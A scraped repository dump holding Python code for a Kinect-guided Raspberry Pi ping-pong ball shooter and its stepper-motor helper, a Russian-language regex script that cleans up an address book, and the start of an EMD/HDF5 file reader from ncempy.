Image Functions (video is unused)\ndef get_depth(img):\n return frame_convert2.pretty_depth_cv(img)\ndef get_video():\n return frame_convert2.video_cv(freenect.sync_get_video()[0])\n\n#Depth camera general information\nxRes, yRes = 640, 480 # Width x Height = 640 x 480 pixels\nhorizonY = 360 # The Y pixel height which corresponds to horizontal plane (depends on physical angle of the Kinect)\nxFOV, yFOV = 58.5, 46.6 # Field of view dimensions (degrees)\ndegreesPerPixelX = xFOV / xRes # For simplification, a perfect camera model is assumed\ndegreesPerPixelY = yFOV / yRes\n\n\n#Function to check if a point is within specified coordinates\nboundaryThresholdX = 20\nboundaryThresholdY = 80\ndef insideBoundaries(x, y):\n if x < xRes - boundaryThresholdX and x > boundaryThresholdX:\n if y < yRes - boundaryThresholdY and y > boundaryThresholdY:\n return True\n return False\n\n#Function to find potential line segments in a contour which could be hands\ndef findHandLineSegments(contours, segmentLength, maxEndpointCloseness):\n contourSegments = []\n for ctr in contours:\n\n #Divide the contour up into segments of set length\n amtOfSegments = len(ctr) / segmentLength \n for i in range(amtOfSegments) :\n #For each line, determine if the endpoints are close enough to each other\n line = ctr[ i * segmentLength : (i+1) * segmentLength ,:]\n x0 = line[0][0][0]\n x1 = line[-1][0][0]\n y0 = line[0][0][1]\n y1 = line[-1][0][1]\n xMid = line[segmentLength / 2][0][0]\n yMid = line[segmentLength / 2][0][1]\n distance = math.hypot(x1 - x0, y1 - y0)\n if distance < maxEndpointCloseness:\n #Discard any lines that are too close to the edge\n if insideBoundaries(x0, y0) and insideBoundaries(x1, y1) and insideBoundaries(xMid, yMid):\n contourSegments.append( line )\n\n #Find lines between halfwaypoints of the lines (overlapping line segments)\n if i > 0:\n line = ctr[ i * segmentLength - ( segmentLength / 2 ) : (i+1) * segmentLength - ( segmentLength / 2 ) ,:]\n x0 = line[0][0][0]\n x1 = line[-1][0][0]\n y0 = line[0][0][1]\n y1 = line[-1][0][1]\n xMid = line[segmentLength / 2][0][0]\n yMid = line[segmentLength / 2][0][1]\n distance = math.hypot(x1 - x0, y1 - y0)\n if distance < maxEndpointCloseness:\n if insideBoundaries(x0, y0) and insideBoundaries(x1, y1) and insideBoundaries(xMid, yMid):\n contourSegments.append( line )\n\n return contourSegments\n\n#Function to draw line segments\ndef drawSegments(segments, Thickness, drawWithAlternatingThickness = False):\n i = 0\n for seg in segments:\n if not drawWithAlternatingThickness:\n cv2.drawContours(imgray, seg, -1 , (0,255,0), Thickness)\n else:\n if i % 2 == 0:\n cv2.drawContours(imgray, seg, -1 , (0,255,0), Thickness)\n else:\n cv2.drawContours(imgray, seg, -1 , (0,255,0), Thickness * 2)\n i = i + 1\n\n \n#Calculate actual distance in meters using a Kinect 360 reading\ndef distanceInMeters(kinectReading):\n #distKin = rawDepth [pY,pX]\n #dist = distanceInMeters(distKin)\n return 0.1236 * math.tan( kinectReading / 2842.5 + 1.1863)\n\n#Function to find the center pixel location of a contour segment\ndef findCenterCoordinates(seg):\n coordinatesAreValid = False\n centerX = -1\n centerY = -1\n M = cv2.moments(seg)\n if M[\"m00\"] > 0:\n centerX = int(M[\"m10\"] / M[\"m00\"])\n centerY = int(M[\"m01\"] / M[\"m00\"]) \n if centerX > 0 and centerX < 640 and centerY > 0 and centerY < 480:\n coordinatesAreValid = True\n return centerX, centerY, coordinatesAreValid\n\n#Function to find center pixel locations of a list of contour segments\ndef findCenterCoordinatesMultiple(contours):\n centerPoints = []\n for ctr in contours:\n ctrX, ctrY, isValid = findCenterCoordinates(ctr)\n if isValid:\n centerPoints.append([ctrX, ctrY])\n return centerPoints\n\n#Find hand shaped contour segments using depth filtering, center locations and the number of convex hull defects\ndef findHandshapes(contourSegments, Range):\n hulls = []\n minDist = -1\n maxDist = -1\n minDefects = -1\n maxDefects = -1\n minArea = -1\n \n if Range == \"C\" or Range == \"Close\":\n minDist = 0.5\n maxDist = 1.4\n minDefects = 4\n maxDefects = 16\n minArea = 1000\n elif Range == \"M\" or Range == \"Mid\":\n minDist = 1.2\n maxDist = 2.5\n minDefects = 4\n maxDefects = 16\n minArea = 600\n elif Range == \"F\" or Range == \"Far\":\n minDist = 2.5\n maxDist = 4.0\n minDefects = 3\n maxDefects = 10\n minArea = 400\n \n\n for seg in contourSegments:\n\n #First check if the segment is at the right depth and at a proper pixel location\n centerX, centerY, coordinatesAreValid = findCenterCoordinates(seg)\n if coordinatesAreValid:\n centerDist = distanceInMeters( rawDepth [centerY,centerX] )\n if centerDist > minDist and centerDist < maxDist:\n\n #Next, check if the number of convex hull defects\n cvxHull = cv2.convexHull(seg,returnPoints = False)\n defects = cv2.convexityDefects(seg,cvxHull)\n amtOfHullDefects = defects.shape[0]\n if amtOfHullDefects >= minDefects and amtOfHullDefects <= maxDefects:\n\n #Next, check if the contour area and the contour's hull area are within a specified ratio\n hullArea = cv2.contourArea(cv2.convexHull(seg,returnPoints = True))\n segArea = cv2.contourArea(seg)\n segToHullRatio = hullArea / segArea\n if segArea > minArea and segToHullRatio > 1.1 and segToHullRatio < 1.5: \n hulls.append(seg)\n return hulls\n\n\n\nlastFoundClose = np.empty(20, dtype = list)\nlastFoundMid = np.empty(20, dtype = list)\nlastFoundFar = np.empty(20, dtype = list)\niterCount = 0\niterationsToTrack = 20\n\nfor i in range(iterationsToTrack):\n lastFoundClose[i] = []\n lastFoundMid[i] = []\n lastFoundFar[i] = []\n \ndef findPersistentCenterPoints(mostRecentCtrPoints, previousCtrPoints):\n toReturn = (-1,-1)\n similarPointsToFind = 6\n \n for ctrPoint in mostRecentCtrPoints:\n #At least 6 points must be found in the last 20 for it to be considered persistant\n similarPointsFound = 0\n\n #Check the last 20 iterations to see how many similar points have been found previously\n for i in range(iterationsToTrack):\n aPreviousIteration = previousCtrPoints[i]\n for prevCtrPoint in aPreviousIteration:\n diffX = abs( ctrPoint[0] - prevCtrPoint[0] )\n diffY = abs( ctrPoint[1] - prevCtrPoint[1] )\n if diffX < 30 and diffY < 40:\n similarPointsFound += 1\n if similarPointsFound > similarPointsToFind:\n similarPointsToFind = similarPointsFound\n toReturn = (ctrPoint[0], ctrPoint[1])\n\n return toReturn\n\n#Functions for the hopper servo\nhopperPin = 21\ndef setHopperServoHome():\n pi.set_servo_pulsewidth(hopperPin,1900)\n time.sleep(0.2)\n pi.set_servo_pulsewidth(hopperPin,0)\n\ndef activateHopper():\n pi.set_servo_pulsewidth(hopperPin,800)\n time.sleep(0.2)\n pi.set_servo_pulsewidth(hopperPin,1900)\n time.sleep(0.25)\n pi.set_servo_pulsewidth(hopperPin,0)\n\n#Function to find the necessary speed to launch the ball\n#This speed is calculated using a parabolic trajectory, with the assumption that air resistance is negligible\nscalingFactor = 1. #An overall scaling factor for any necessary quick tuning\nbarrelAngle = 55 #The barrel angle (degrees)\ndef findLaunchVelocity(distanceX, distanceY):\n velSquared = -9.81 * distanceX ** 2 / (2 * distanceY * math.cos(barrelAngle) ** 2) * 1 / (1 - math.tan(barrelAngle) * distanceX / distanceY)\n vel = math.sqrt(abs(velSquared))\n \n return vel\n \n \n#Function to activate the ESC Brushless Motors:\nescPin = 20\nflywheelOffAxisAngle = 10 #The motors are mounted off axis to give spin for stability\nflywheelRadius = 0.02 #In meters\nmotorKVRating = 600 #Per volt applied, the motor will spin at this RPM (Depends on motor and load)\nescVoltage = 5.8 #The input voltage to the esc. Should be a stable voltage for consistent results. \nmaxPWMPulsewidth = 2100 #The high range PWM extreme for activating the ESC (max speed)\nminPWMPulsewidth = 900 #The low range PWM extreme for activating the ESC (zero speed)\n\n\n#Calibrate the maximum and minimum PWM\n#This step makes the ESCs audibly beep, which gives a good alert for any persons nearby\npi.set_servo_pulsewidth(escPin, maxPWMPulsewidth)\n#pi.set_servo_pulsewidth(escPin, 0)\ntime.sleep(1)\npi.set_servo_pulsewidth(escPin, minPWMPulsewidth)\n#pi.set_servo_pulsewidth(escPin, 0)\ntime.sleep(1)\n \ndef launchBall(launchVelocity):\n\n\n #Calculate the required PWM signal\n wheelVelocity = launchVelocity / math.cos( math.radians( flywheelOffAxisAngle ) )\n wheelRPM = wheelVelocity * 60 / (2 * math.pi ) / flywheelRadius # v = 2pi / 60 * r * RPM\n minimumRPM = 0\n maximumRPM = escVoltage * motorKVRating\n if wheelRPM > maximumRPM:\n print \"Cant launch far enough\"\n wheelRPM = maximumRPM - 30\n\n \n PWMSignal = np.interp(wheelRPM, [0, maximumRPM], [minPWMPulsewidth, maxPWMPulsewidth])\n PWMSignal = int(PWMSignal)\n \n \n print PWMSignal\n\n\n\n #Fire at speed\n pi.set_servo_pulsewidth(escPin, PWMSignal)\n #pi.set_servo_pulsewidth(escPin, 0)\n time.sleep(1)\n\n #Drop the ball down\n activateHopper()\n time.sleep(0.4)\n \n # Shut the ESC back down\n pi.set_servo_pulsewidth(escPin, minPWMPulsewidth)\n #pi.set_servo_pulsewidth(escPin, 0)\n\n\n \n \n\n\n\n#Main Program\nsetHopperServoHome()\n \nwhile 1:\n #------------------------------------------------------------------------------\n #Measure start time\n start = time.time()\n\n #Read Trackbars\n cannyLow = cv2.getTrackbarPos('Canny Low', 'Depth')\n cannyHigh = cv2.getTrackbarPos('Canny High', 'Depth')\n ctrAreaThresh = cv2.getTrackbarPos('Contour Length', 'Depth')\n ctrLenThresh = cv2.getTrackbarPos('Contour Area', 'Depth')\n #segmentLength = cv2.getTrackbarPos('Segment Length', 'Depth')\n #segLenThreshold = cv2.getTrackbarPos('Closeness Threshold', 'Depth')\n\n #Get the raw 11-bit integer depth image, and make an 8-bit copy for OpenCV operations \n rawDepth = freenect.sync_get_depth()[0]\n imgray = np.copy(rawDepth)\n imgray = get_depth(imgray)\n\n #Use Canny algorithm to find edges on the depth image\n edges = cv2.Canny(imgray,cannyLow,cannyHigh,3)\n\n #Dilation and erosion to make the edges more pronounced\n edKernel = np.ones((3,3),np.uint8)\n edges = cv2.dilate(edges, edKernel, iterations = 1)\n\n #Contour detection\n contours, hierarchy = cv2.findContours(edges, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)\n #Preliminary contour filtering\n filteredContours = []\n for ctr in contours:\n approx = cv2.approxPolyDP(ctr,0.01*cv2.arcLength(ctr,True),True)\n area = cv2.contourArea(ctr)\n if area > ctrAreaThresh and len(approx) > ctrLenThresh: \n filteredContours.append(ctr) \n\n #Draw the contours\n #cv2.drawContours(imgray, filteredContours, -1, (0,255,0), 2)\n\n #Find line segments which might resemble a hand\n contourSegmentsClose = findHandLineSegments(filteredContours, 370, 80)\n contourSegmentsMid = findHandLineSegments(filteredContours, 200, 50)\n contourSegmentsFar = findHandLineSegments(filteredContours, 80, 30)\n\n #Draw the line segments\n #drawSegments(contourSegmentsClose,3,True)\n #drawSegments(contourSegmentsMid,3,True)\n #drawSegments(contourSegmentsFar,3,True)\n \n #Convex hulls of hands\n handshapesClose = findHandshapes(contourSegmentsClose, \"Close\")\n handshapesMid = findHandshapes(contourSegmentsMid, \"Mid\")\n handshapesFar = findHandshapes(contourSegmentsFar, \"Far\")\n\n #Find the center coordinates of the hand shapes, and keep track of the most recent n iterations\n centerPointsClose = findCenterCoordinatesMultiple(handshapesClose)\n centerPointsMid = findCenterCoordinatesMultiple(handshapesMid)\n centerPointsFar = findCenterCoordinatesMultiple(handshapesFar)\n\n #Find coordinates for handshapes\n handCoordinatesClose = findPersistentCenterPoints(centerPointsClose, lastFoundClose)\n handCoordinatesMid = findPersistentCenterPoints(centerPointsMid, lastFoundMid)\n handCoordinatesFar = findPersistentCenterPoints(centerPointsFar, lastFoundFar)\n\n #Add the most recent findings to the list\n lastFoundClose[iterCount] = centerPointsClose \n lastFoundMid[iterCount] = centerPointsMid\n lastFoundFar[iterCount] = centerPointsFar\n\n #Draw the (potential) hand segments \n drawSegments(handshapesClose, 2)\n drawSegments(handshapesMid, 4)\n drawSegments(handshapesFar, 6)\n\n\n #Find where to toss to \n tossRange = \"\"\n toTossTo = (-1,-1)\n if not handCoordinatesClose == (-1,-1):\n cv2.circle(imgray, handCoordinatesClose, 12, (0,255,0), 4)\n tossRange = \"Close\"\n toTossTo = handCoordinatesClose\n\n elif not handCoordinatesMid == (-1,-1):\n cv2.circle(imgray, handCoordinatesMid, 14, (0,255,0), 4)\n tossRange = \"Mid\"\n toTossTo = handCoordinatesMid\n \n elif not handCoordinatesFar == (-1,-1):\n cv2.circle(imgray, handCoordinatesFar, 16, (0,255,0), 4)\n tossRange = \"Far\"\n toTossTo = handCoordinatesFar\n\n #Determine the angle which the Kinect needs to rotate to center the hand\n if not toTossTo == (-1,-1):\n \n horizPixelDistanceFromCenter = toTossTo[0] - ( xRes / 2 )\n vertPixelDistanceFromHorizon = horizonY - toTossTo[1]\n \n toTurnAngle = degreesPerPixelX * horizPixelDistanceFromCenter\n launchAngle = degreesPerPixelY * vertPixelDistanceFromHorizon\n\n if toTurnAngle < -1 or toTurnAngle > 1:\n subprocess.call( [ 'python2.7', 'MoveStepper.py', str(toTurnAngle) ] )\n #MoveStepper.turnDegrees(toTurnAngle)\n\n else:\n distanceToHand = distanceInMeters( rawDepth [toTossTo[1], toTossTo[0]] )\n horizDistanceMeters = distanceToHand * math.sin(math.radians(launchAngle))\n vertDistanceMeters = distanceToHand * math.cos(math.radians(launchAngle))\n\n launchVelocity = findLaunchVelocity(horizDistanceMeters, vertDistanceMeters)\n launchBall(launchVelocity)\n #cv2.putText(imgray, \"Up (m): \" + str(horizDistanceMeters), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,255,0))\n #cv2.putText(imgray, \"Out (m): \" + str(vertDistanceMeters), (10, 80), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,255,0))\n\n #Wait for a few seconds (Won't need to catch again for at least this long ;)\n time.sleep(3)\n \n \n\n \n \n\n #Draw the horizontal plane line and a center line\n cv2.line(imgray,(0,horizonY),(639,horizonY),(0,255,0),1)\n cv2.line(imgray,(xRes/2, horizonY - 50), (xRes/2 , horizonY + 50),(0,255,0),1)\n \n #Display the image\n cv2.imshow('Depth', imgray)\n #cv2.imshow('Edges', edges)\n #cv2.imshow('Video', get_video())\n\n iterCount = ( iterCount + 1 ) % iterationsToTrack \n if cv2.waitKey(10) == 27:\n break\n\n\n #Calculate the FPS\n totTime = time.time() - start\n FPS = 1 / totTime\n #-------------------------------------------------------------------------------\n \n# When everything done, release the capture\nprint 'FPS: ', FPS\npi.stop() # Disconnect pigpio.\ncv2.destroyAllWindows()\n" }, { "alpha_fraction": 0.7798507213592529, "alphanum_fraction": 0.7910447716712952, "avg_line_length": 58.55555725097656, "blob_id": "ffa55b1a666edad504c854e0c77e6e70ba2e60bc", "content_id": "e29126ea4bf8dd146d34485b67402e9c9a8b90cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 536, "license_type": "no_license", "max_line_length": 126, "num_lines": 9, "path": "/Readme.txt", "repo_name": "cjb22/Ping-Pong-Shooter", "src_encoding": "UTF-8", "text": "This code is for a self-made Ping-Pong ball shooter which finds hands using a depth image and tosses a ball straight at it.\nThe code is run on a Raspberry Pi 3 B+.\nInformation and demonstrations at www.tiny.cc/ShootingRobot\n\nMain Program = Kinect.py (Python 2.7) \n\nBefore running, ensure that the Xbox 360 Kinect is plugged in.\nThe program will take several seconds to start up, some patience is required :) \nOccasionally the program quits with an error message several seconds after starting, just restart the program if this happens.\n" }, { "alpha_fraction": 0.5656565427780151, "alphanum_fraction": 0.5941230654716492, "avg_line_length": 25.475608825683594, "blob_id": "ae5236545c1962703c1e1a7359dc6fbaeead8bf5", "content_id": "3bbf58987562350e1fcb0dbfa05164e13efdf156", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2178, "license_type": "no_license", "max_line_length": 114, "num_lines": 82, "path": "/MoveStepper.py", "repo_name": "cjb22/Ping-Pong-Shooter", "src_encoding": "UTF-8", "text": "import RPi.GPIO as GPIO\nimport time\nimport sys\n\n#Define The Stepper Control Pins\nStepPin = 19\nDirectionPin = 26\n\n#Setup GPIO\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(StepPin,GPIO.OUT)\nGPIO.setup(DirectionPin, GPIO.OUT)\n\n\nStepPauseTime = 0.0005\n\n \ndef turnSteps( dir, steps):\n if dir == \"CW\":\n GPIO.output(DirectionPin,GPIO.LOW)\n else:\n GPIO.output(DirectionPin,GPIO.HIGH)\n\n for i in range(steps):\n GPIO.output(StepPin, GPIO.HIGH)\n time.sleep(StepPauseTime)\n GPIO.output(StepPin, GPIO.LOW)\n time.sleep(StepPauseTime)\n\n\n# Function to turn the stepper motor, which is connected to a bigger gear\nbigToSmallRatio = 123/25. # Gear ratio\ndegreesPerStep = 1.8 / 8 # Using an 1.8 degree stepper motor, operating at 1/8th steps, fill in 1.8 / 8\ndef turnDegrees( degrees):\n\n # Check the direction to turn\n if degrees < 0:\n GPIO.output(DirectionPin,GPIO.HIGH) # CCW\n degrees = degrees * -1\n else:\n GPIO.output(DirectionPin,GPIO.LOW) # CW\n\n # Determine the amount of steps to turn by\n smallGearToTurn = bigToSmallRatio * degrees\n stepsToTake = smallGearToTurn / degreesPerStep\n\n # Turn the stepper\n for i in range(int(stepsToTake)):\n GPIO.output(StepPin, GPIO.HIGH)\n time.sleep(StepPauseTime)\n GPIO.output(StepPin, GPIO.LOW)\n time.sleep(StepPauseTime)\n \n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 3:\n dir = sys.argv[1]\n steps = int(sys.argv[2])\n if (dir == \"CW\" or dir == \"CCW\"):\n if (steps > 0 and steps <= 2000):\n turnSteps(dir, steps)\n else: print(\"Amount of steps not valid. (0 - 2000)\")\n else:print (\"Direction not valid. (CW or CCW)\")\n\n elif len(sys.argv) == 2:\n degrees = float(sys.argv[1])\n if degrees > -360 and degrees < 360:\n turnDegrees(degrees)\n else: print(\"Degrees number not valid. (-360 - 360)\")\n \n \n\n else:\n print(\"MoveStepper test use case (R-L-R)\")\n turnSteps(\"CW\",250)\n turnSteps(\"CCW\",500)\n turnSteps(\"CW\",250)\n \n\n \nGPIO.cleanup() \n" } ]
3
passatijy/2.2.Regexp
https://github.com/passatijy/2.2.Regexp
46fd201155721e32d6292f39322aa72acc478463
a9e4c9db1ae86f9f269d59a13fb986efd9d49cca
fc3d554aaef4d1747ad691254a88667df450b486
refs/heads/master
2020-07-20T04:36:30.401251
2019-09-10T14:55:25
2019-09-10T14:55:25
206,574,100
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5667185187339783, "alphanum_fraction": 0.5931570529937744, "avg_line_length": 28.495412826538086, "blob_id": "093286b8df7c523a3458c794f0d6f67acfdc137e", "content_id": "e0453b452976d7e4c5379785b6d165f4fef2fead", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3767, "license_type": "no_license", "max_line_length": 153, "num_lines": 109, "path": "/adressbook.py", "repo_name": "passatijy/2.2.Regexp", "src_encoding": "UTF-8", "text": "# Tasks:\n'''\n1. поместить Фамилию, Имя и Отчество человека в поля lastname, \nfirstname и surname соответственно. В записной книжке \nизначально может быть Ф + ИО, ФИО, а может быть сразу правильно: Ф+И+О;\n2. привести все телефоны в формат +7(999)999-99-99. \nЕсли есть добавочный номер, формат будет такой: \n+7(999)999-99-99 доб.9999;\n3. объединить все дублирующиеся записи о человеке в одну.\n'''\nimport re\nfrom pprint import pprint\n# читаем адресную книгу в формате CSV в список contacts_list\nimport csv\nwith open(\"phonebook_raw.csv\", encoding=\"utf-8\") as f:\n rows = csv.reader(f, delimiter=\",\")\n contacts_list = list(rows)\n#print(contacts_list)\n\n# TODO 1: выполните пункты 1-3 ДЗ\n# ваш код\n\ndef my_replace(srch_pattrn, rpl_pattrn, mylist):\n\tres_contacts = []\n\tfor elem in mylist:\n\t\tif elem[0] != 'lastname':\n\t\t\tk = ','.join(elem)\n\t\t\tk = re.sub(srch_pattrn, rpl_pattrn, k)\n\t\t\telem = k.split(',')\n\t\t\tres_contacts.append(elem)\n\t\telse:\n\t\t\tres_contacts.append(elem)\n\treturn res_contacts\n\ndef glue_two_elems(elem1,elem2):\n\t'''return only one element with maximum info'''\n\tone = elem1.copy()\n\ttwo = elem2.copy()\n\ti = 0\n\twhile i < len(elem1):\n#\t\tif one[i] and two[i] is not '':\n\t\tif one[i] is not '':\n\t\t\tif two[i] is not '':\n\t\t\t\tif one[i] != two[i]:\n\t\t\t\t\tone[i] = one[i] + '/' + two[i]\n\t\telse:\n\t\t\tif two[i] is not '':\n\t\t\t\tone[i] = two[i]\n\t\ti = i + 1\n\treturn one\n\n\ndef my_uniq(mylist):\n\t'''uniq bu ID = lastname '''\n\ttemplist = mylist.copy()\n\tres_contacts=[]\n\ti = 0\n\twhile i < len(templist):\n\t\tres_elem = templist[i]\n\t\t#print('Перебираем, элемент номер:',i,'является:',templist[i])\n\t\tk = i + 1\n\t\twhile k < len(templist):\n\t\t\t#print(' ищем совпадения, рез. элемент:', res_elem,'элемент k:', templist[k])\n\t\t\tif res_elem[0] == templist[k][0]:\n\t\t\t\t#print(' совпадение найдено')\n\t\t\t\tres_elem = glue_two_elems(res_elem,templist[k])\n\t\t\t\ttemplist.remove(templist[k])\n\t\t\t\t#print(' результирующий элемент для добавления:',res_elem)\n\t\t\t#else:\n\t\t\t\t#print(' совпадение не найдено')\n\t\t\tk = k + 1\n\t\tres_contacts.append(res_elem)\n\t\ti = i + 1\n\treturn res_contacts\n\n# TODO 2: сохраните получившиеся данные в другой файл\n# код для записи файла в формате CSV\ndef filewriter(outputlist):\n\twith open(\"phonebook.csv\", \"w\", encoding=\"utf-8\") as f:\n\t\tdatawriter = csv.writer(f, delimiter=',')\n\t\t# Вместо contacts_list подставьте свой список\n\t\tdatawriter.writerows(outputlist)\n\n\nif __name__ == '__main__':\n\tfor k in contacts_list:\n\t\tprint('Initial list:', k)\n\t# first call r\"(^([А-Яа-я])*)(\\s)([А-Яа-я])\", r\"\\1,\\4\", k\n\trename = my_replace(\n\t\tr\"(^([А-Яа-я])*)(\\s)([А-Яа-я])\"\n\t\t, r\"\\1,\\4\"\n\t\t, contacts_list)\n\t# second call r\",([А-Яа-я]*)( )([А-Яа-я]*)(,)\", r\",\\1,\\3\", k\n\trename1 = my_replace(\n\t\tr\",([А-Яа-я]*)( )([А-Яа-я]*)(,)\"\n\t\t, r\",\\1,\\3\"\n\t\t, rename)\n\t#print(rename1)\n\t# last call r\"(\\+)*(\\d)(\\s)*(\\(*)(\\d\\d\\d)(\\)*)(\\s*)(\\-*)(\\d\\d\\d)(\\-*)(\\d\\d)(\\-*)(\\d\\d)(\\s*)(\\(*)(доб\\.)*(\\s*)(\\d*)(\\))*\", r\"+\\2(\\5)\\9-\\11-\\13 \\16\\18\", k\n\trename2 = my_replace(\n\t\tr\"(\\+)*(\\d)(\\s)*(\\(*)(\\d\\d\\d)(\\)*)(\\s*)(\\-*)(\\d\\d\\d)(\\-*)(\\d\\d)(\\-*)(\\d\\d)(\\s*)(\\(*)(доб\\.)*(\\s*)(\\d*)(\\))*\"\n\t\t, r\"+\\2(\\5)\\9-\\11-\\13 \\16\\18\"\n\t\t, rename1)\n\t#print(rename2)\n\tprint('========================')\n\tresult = my_uniq(rename2)\n\tfor k in result:\n\t\tprint('Result list:', k)\n\tfilewriter(result)\n" }, { "alpha_fraction": 0.4615384638309479, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 12, "blob_id": "c93cb42871656542263c136a2cfcff9513a2fa3f", "content_id": "efe3c2596c11725331327a38dc9f59697ee7e1b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 13, "license_type": "no_license", "max_line_length": 12, "num_lines": 1, "path": "/README.md", "repo_name": "passatijy/2.2.Regexp", "src_encoding": "UTF-8", "text": "# 2.2.Regexp\n" } ]
2
ckgrosch/particleRecognition
https://github.com/ckgrosch/particleRecognition
87f127e812654c0cefd41aeb0a1a764abde77d8c
33b82563f35aba52fe783aa7957e9e9b37d18184
26ea40aaa5454c0582eb2fbfc2e44b2260569732
refs/heads/master
2018-10-22T05:19:38.061805
2018-08-24T00:31:20
2018-08-24T00:31:20
105,322,046
1
1
null
2017-09-29T22:24:02
2019-07-24T21:53:11
2020-02-24T18:02:49
Python
[ { "alpha_fraction": 0.4938505291938782, "alphanum_fraction": 0.4976348280906677, "avg_line_length": 35.211429595947266, "blob_id": "db6753490044fd4e802600aa578cc0939281eba3", "content_id": "818c641a83894af67fe7b806ed038fc0a8cdfd46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12684, "license_type": "no_license", "max_line_length": 197, "num_lines": 350, "path": "/image_processing/ncempy/io/emd.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "'''\nThis module provides an interface to the EMD file format.\n\nSee https://emdatasets.com/ for more details.\n'''\n\nimport numpy as np\nimport h5py\nimport datetime\n\n\nclass fileEMD:\n '''Class to represent EMD files. \n \n Implemented for spec 0.2 using the recommended layout for metadata.\n \n Meant to provide convenience functions for commonly occuring tasks. This means that you will still want to acces fileEMD.file_hdl to manipulate the HDF5 file for not so commonly occuring tasks.\n \n Parameters:\n filename (str): Name of the EMD file.\n readonly (bool): Set to open in read only mode.\n \n '''\n \n def __init__(self, filename, readonly=False):\n '''Init opening/creating the file.\n \n '''\n \n ## necessary declarations in case something goes bad\n self.file_hdl = None\n \n # convenience handles to access the data in the emd file, everything can as well be accessed using the file_hdl\n self.version = None\n self.data = None\n self.microscope = None\n self.sample = None\n self.user = None\n self.comments = None\n self.list_emds = [] # list of HDF5 groups with emd_data_type type\n \n # check for string\n if not isinstance(filename, str):\n raise TypeError('Filename is supposed to be a string!')\n\n # try opening the file\n if readonly:\n try:\n self.file_hdl = h5py.File(filename, 'r')\n except:\n print('Error opening file for readonly: \"{}\"'.format(filename))\n raise\n else:\n try:\n self.file_hdl = h5py.File(filename, 'a')\n except:\n print('Error opening file for read/write: \"{}\"'.format(filename))\n raise\n \n \n # if we got a working file\n if self.file_hdl: \n \n # check version information\n if 'version_major' in self.file_hdl.attrs and 'version_minor' in self.file_hdl.attrs:\n # read version information\n self.version = (self.file_hdl.attrs['version_major'], self.file_hdl.attrs['version_minor'])\n # compare to implementation\n if not self.version == (0,2):\n print('WARNING: You are reading a version {}.{} EMD file, this implementation assumes version 0.2!'.format(self.version[0], self.version[1]))\n else:\n # set version information\n if not readonly:\n self.file_hdl.attrs['version_major'] = 0\n self.file_hdl.attrs['version_minor'] = 2\n \n # check for data group\n if not 'data' in self.file_hdl:\n if not readonly:\n self.data = self.file_hdl.create_group('data')\n else:\n self.data = self.file_hdl['data']\n \n # check for data group\n if not 'microscope' in self.file_hdl:\n if not readonly:\n self.microscope = self.file_hdl.create_group('microscope')\n else:\n self.microscope = self.file_hdl['microscope']\n \n # check for data group\n if not 'sample' in self.file_hdl:\n if not readonly:\n self.sample = self.file_hdl.create_group('sample')\n else:\n self.sample = self.file_hdl['sample']\n \n # check for data group\n if not 'user' in self.file_hdl:\n if not readonly:\n self.user = self.file_hdl.create_group('user')\n else:\n self.user = self.file_hdl['user']\n \n # check for data group\n if not 'comments' in self.file_hdl:\n if not readonly:\n self.comments = self.file_hdl.create_group('comments')\n else:\n self.comments = self.file_hdl['comments']\n \n # find emd_data_type groups in the file\n self.list_emds = self.find_emdgroups(self.file_hdl)\n \n\n def __del__(self):\n '''Destructor for EMD file object.\n \n '''\n \n # close the file\n if(self.file_hdl):\n self.file_hdl.close()\n\n\n def find_emdgroups(self, parent):\n '''Find all emd_data_type groups within the group parent and return a list of references to their HDF5 groups.\n \n Parameters:\n parent (h5py._hl.group.Group): Handle to the parent group.\n \n Returns:\n (list): A list of h5py._hl.group.Group handles to children groups being emd_data_type groups.\n \n '''\n \n emds = []\n \n # recursive function to run and retrieve groups with emd_group_type set to 1\n def proc_group(group, emds):\n # take a look at each item in the group\n for item in group:\n # check if group\n if group.get(item, getclass=True) == h5py._hl.group.Group:\n item = group.get(item)\n # check if emd_group_type\n if 'emd_group_type' in item.attrs:\n if item.attrs['emd_group_type'] == 1:\n emds.append(item)\n # process subgroups\n proc_group(item, emds)\n \n # run\n proc_group(parent, emds)\n \n return emds\n\n\n def get_emdgroup(self, group):\n '''Get the emdtype data saved in in group.\n \n Parameters:\n group (h5py._hl.group.Group): Reference to the emdtype HDF5 group.\n \n Returns:\n (tuple/None): None or tuple containing:\n \n np.ndarray: The data of the emdtype group.\n \n list: List of dimension vectors plus labels and units.\n \n '''\n \n # check input\n if not isinstance(group, h5py._hl.group.Group):\n raise TypeError('group needs to refer to a valid HDF5 group!')\n \n if not 'emd_group_type' in group.attrs:\n raise TypeError('group is not a emd_group_type group!')\n if not group.attrs['emd_group_type'] == 1:\n raise TypeError('group is not a emd_group_type group!')\n\n # retrieve data\n try:\n # get the data\n data = group['data'][:]\n \n # get the dims\n dims = []\n for i in range(len(data.shape)):\n dim = group['dim{}'.format(i+1)]\n # save them as (vector, name, units)\n \n if isinstance(dim.attrs['name'], np.ndarray):\n name = dim.attrs['name'][0]\n else:\n name = dim.attrs['name']\n \n if isinstance(dim.attrs['units'], np.ndarray):\n units = dim.attrs['units'][0]\n else:\n units = dim.attrs['units']\n \n dims.append( (dim[:], name.decode('utf-8'), units.decode('utf-8')) )\n \n dims = tuple(dims)\n \n return data, dims\n \n except:\n # if something goes wrong, return None\n print('Content of \"{}\" does not seem to be in emd specified shape'.format(group.name))\n \n return None\n \n\n def write_dim(self, label, dim, parent):\n '''Auxiliary function to write a dim dataset to parent.\n \n Input is not checked for sanity, so handle exceptions in call.\n \n Parameters:\n label (str): Label for dataset, usually dim1, dim2, dimN.\n dim (tuple): Tuple containing (data, name, units).\n parent (h5py._hl.group.Group): HDF5 handle to parent group.\n \n Returns:\n 